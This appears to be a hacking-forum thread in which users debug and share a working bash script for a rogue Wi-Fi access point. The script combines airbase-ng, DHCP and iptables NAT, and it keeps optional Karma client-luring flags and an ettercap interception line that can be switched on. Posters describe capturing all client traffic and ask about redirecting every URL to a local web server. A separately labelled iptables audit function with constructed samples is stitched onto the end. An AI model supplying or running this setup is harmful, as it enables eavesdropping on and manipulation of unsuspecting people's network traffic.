-
Crap pastebin is down and I don't have the script XD yeah I know.. backup well I didn't :P .. Working on my Jasager on Fonera+ and successfully got ettercap installed on it. But I forgot how the heck I got ettercap working the way I want it to.
Would anyone mind providing me with the script if they have it somewhere? :)
edit: It's back up again, phew ...
-
Speed
As a lot of you know Badkarma has written a wicked rogue AP with Karma functionality that uses ettercap for packet capture and manipulation. It is not only very well written but made for BT4. Seems all his apps are for BT4 now...
http://www.darkoperator.com/tools-and-scripts/
The P C 60 seem to work fine etc. I have tried more or less every softAP out there, but they all seem to suffer from one detail. They are slow. I am not too sure if fragmentation is the whole story. Has ANYBODY had a rogue AP working that runs really well? If so what wifi card/s are you using?
onryo
-
I can't get the internet access on the rogue AP to work at all. I have modded the script slightly to make it work with dhcpd3 on BT4. I'm using BT4 in VMWare with Alfa USB and wired ethernet. Also modded it so it does not use the -p -c flags to interfere with other clients or AP's, and also removed ettercap for now while I try to get it to work.
The client gets through the full DHCP cycle, discover, offer, request, ack. Client gets an IP. I can see in Wireshark that the domain names are resolving successfully, but no internet access. Tried using MTU 1500 and 1400. Also checked I have internet access in BT4 by doing wget. Here's the modded script:
Code:
#!/bin/bash
echo -n "Enter the name of the interface connected to the internet, for example eth0: "
read -e IFACE
echo -n "Enter your wireless interface name, for example wlan0: "
read -e WIFACE
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
kill `cat /var/run/dhcp3-server/dhcpd.pid`
killall -9 dhcpd airbase-ng ettercap
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
modprobe tun
konsole -e airbase-ng -e "$ESSID" -v $WIFACE &
#konsole -e airbase-ng -e "$ESSID" -P -C 30 -v $WIFACE &
sleep 10
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1500
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
echo > '/var/lib/dhcp3/dhcpd.leases'
konsole -e dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
#konsole -e ettercap -T -q -p -i at0 // // &
sleep 8
Any ideas?
-
Same problem here, I can connect to my access point, but not to the internet. I have used your modified code.
(P.S. Does anybody know how to rewrite it to forward all URLs to an Apache web server running on the same machine as the access point?)
-
same here :S waiting for solution ... searching to solve this ..
-
This worked perfectly. Thanks! Very well explained. Kudos
-
I've finally got this working after a long while. My setup is as follows:
Vista laptop running BT4-Beta in VMWare Player
Internet source is a wireless connection using the on board laptop wifi card, to my Netgear DG834GT router.
Using the Alfa USB wifi adapter for creating the AP.
Below is the script which I have modified to get it to work with BT4-Beta. I haven't tried it in BT4 PreFinal.
Note: The script is also modified so that it will not use the -P and -C options of airbase (the ones which interfere with other clients aka illegal). If you want that on then uncomment and comment the relevant lines.
I also have the ettercap section of the script commented out because I found that BT lagged too much or crashed, you can try it though, just uncomment the line.
Also: I have modified the script so that it does not ask for the wireless and Internet source interfaces - I got sick of typing wlan0 and eth0 every time I ran the script. It only asks for the AP SSID, the two interfaces are hard coded as wlan0 for the Alfa, and eth0 for the Internet source (even though my Internet source is wireless not ethernet).
This is running very fast from the client's point of view, I can surf online and I can't tell the difference between using the rogue AP or connecting directly to the router. I have only tried this using an iPhone as the client so far. I can also open up Wireshark and listen on the at0 interface to capture all the traffic passed through the rogue AP.
Be sure to turn networking on in BT before running the script - otherwise BT will not have an Internet connection to route for the clients. I do this by:
Code:
/etc/init.d/networking start
Then I do a quick test using wget to verify that my internet connection is available to BT.:
Modified script for BT4-Beta:
Code:
#!/bin/bash
# The iface inputs are commented out and hard coded, to save having to type them every time the script is executed
#echo -n "Enter the name of the interface connected to the internet, for example eth0: "
#read -e IFACE
#echo -n "Enter your wireless interface name, for example wlan0: "
#read -e WIFACE
# here I have hard coded the two interfaces, change them if yours are different
IFACE=eth0
WIFACE=wlan0
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
kill `cat /var/run/dhcpd.pid`
killall -9 dhcpd airbase-ng ettercap
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
modprobe tun
# Below is the safe airbase command which does not use the evil options
konsole -e airbase-ng -e "$ESSID" -v $WIFACE &
# The line below is commented out, it uses the evil options -P and -C
#konsole -e airbase-ng -e "$ESSID" -P -C 30 -v $WIFACE &
sleep 10
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
echo > '/var/lib/dhcp3/dhcpd.leases'
konsole -e dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
# Below ettercap is commented out, just remove the # if you want it on
#konsole -e ettercap -T -q -p -i at0 // // &
sleep 8
echo "1" > /proc/sys/net/ipv4/ip_forward
Hope this helps those that couldn't get this working in BT4. Thanks to the original author for this interesting experiment.
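-
Added example, not part of any post in this thread: both scripts above flush every iptables chain, set the FORWARD policy to ACCEPT and add a MASQUERADE rule, and only the last script also writes 1 to /proc/sys/net/ipv4/ip_forward. The function below reports which of those settings are present on a host, so the state can be compared before and after a lab run; the name `audit_forwarding_state` and both sample rule dumps are constructed for illustration.

```bash
#!/bin/bash
# Added example: list the forwarding/firewall state the thread's scripts leave behind.
# Inputs are passed as text so it runs offline; on a live host (as root) use:
#   audit_forwarding_state "$(cat /proc/sys/net/ipv4/ip_forward)" "$(iptables-save)"

# audit_forwarding_state IP_FORWARD_VALUE IPTABLES_SAVE_TEXT -> one finding per line
audit_forwarding_state() (
    fwd=$1; rules=$2; table=""; n=0
    if [ "$fwd" = "1" ]; then echo "ip_forward=1: kernel is routing between interfaces"; fi
    while IFS= read -r line; do
        case "$line" in
            \**) table=${line#\*}; n=0 ;;              # table header, e.g. "*nat"
            ":FORWARD ACCEPT"*)
                if [ "$table" = filter ]; then echo "filter FORWARD policy is ACCEPT"; fi ;;
            "-A "*)
                n=$((n + 1))                            # count rules in the current table
                case "$table:$line" in
                    nat:*"-j MASQUERADE"*) echo "nat rule present: $line" ;;
                esac ;;
            COMMIT)
                if [ "$table" = filter ] && [ "$n" -eq 0 ]; then echo "filter table has no rules (flushed)"; fi ;;
        esac
    done <<EOF
$rules
EOF
)

# Constructed iptables-save output: what the scripts' iptables lines produce with IFACE=eth0.
SAMPLE_AFTER_SCRIPT='*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
COMMIT'

# Constructed baseline: a host that filters forwarded traffic and has no NAT rule.
SAMPLE_BASELINE='*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
COMMIT'

audit_forwarding_state 1 "$SAMPLE_AFTER_SCRIPT"
```

Saving `iptables-save` output before running either script gives a rule set that `iptables-restore` can load afterwards, since the scripts flush the existing rules without keeping a copy.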